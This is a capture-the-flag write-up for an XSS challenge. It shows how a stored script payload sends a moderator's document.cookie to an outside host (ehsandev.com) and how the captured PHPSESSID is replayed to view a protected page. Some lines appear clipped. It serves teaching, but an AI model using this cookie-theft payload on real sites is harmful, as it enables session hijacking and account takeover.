Created: 2014-11-08 00:54:47
Last modified: 2014-12-11 23:27:16
The bad guys have hidden their access codes on an anonymous secure page service. Our intelligence tells us that the codes was posted on a page with id
43440b22864b30a0098f034eaf940730ca211a55, but unfortunately it's protected by a password, and only site moderators can view the post without the password. Can you help us recover the codes?
What happens if you put HTML into a page?
Exploiting XSS vulnerabilities to get Admin user's session cookie.
Cross-site scripting (commonly referred to as XSS) is a type of web exploit which involves an attacker being able to inject client side scripting into pages viewable by other users. First register an account and log in. Then make a simple page such as
<h1>Hi</hi> which produces
43440b22864b30a0098f034eaf940730ca211a55. So now we know what to do once we have the moderator cookie, but how do we get it?
We can form a page such as
<script> location.href=("http://ehsandev.com/pico.php?c="+document.cookie) </script>
When a user browses to this page they are redirected to a page on a server (in this case ehsandev.com) with their cookies in the url. The attacker can then simply view the log of the request made to the servers and copy out the session id. In this example, when we hit the report button the moderator would be redirected to
02b8t6vqgvfigv4at2ovp3e0g6 is the session cookie we are looking for and would appear in the logs of this site. Finally, we have to manually set the admin cookie to our
PHPSESSID cookie using a Chrome extension such as EditThisCookie or a Firefox extension such as Cookies Manager+. Then, we view the page
43440b22864b30a0098f034eaf940730ca211a55 and we get our flag!